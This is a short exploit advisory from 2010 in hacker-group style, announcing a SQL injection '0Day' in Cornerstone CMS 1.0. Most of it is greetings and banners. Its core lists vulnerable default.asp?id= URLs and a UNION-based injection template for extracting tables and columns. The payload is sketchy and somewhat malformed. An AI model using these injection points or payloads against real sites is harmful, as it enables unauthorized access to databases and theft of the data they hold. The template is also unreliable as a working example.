# Exploit Title: Cornerstone CMS SQL Injection Vulnerability # Date: 22-06-2010 # Author: Th3 RDX # Software Link: # Version: 1.0 # Tested on: Demo Site # category: webapp # Code : -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Lucky(www.indishell.in) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Gr33tz to ### Team I.C.A | www.IndiShell.in | Team I.C.W ### -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ############################################################################## %// ----- [ Founder ] ----- Th3 RDX ----- [ E - mail ] ----- th3rdx@gmail.com %\\ ############################################################################## ############################################################################## %// ----- [Title] ----- Cornerstone CMS SQL Injection Vulnerability ----- [ Vendor ] ----- http://www.cs-tech.com/ %\\ ############################################################################## ############################################################################## %// ----- [ Exploit (s) ] ----- Put [CODE] = SQL Injection Code {e.g = default.asp?id=60+and+1=0+ Union 2,3,4,5,6,7,8,9,10 (tables & column) } [SQLi] http://server/cs-cms/default.asp?id=70[CODE] [SQLi] http://server/cs-cms/default.asp?id=44[CODE] %\\ ############################################################################## -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Bug discovered : 22 June 2010 finish(0); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #End 0Day#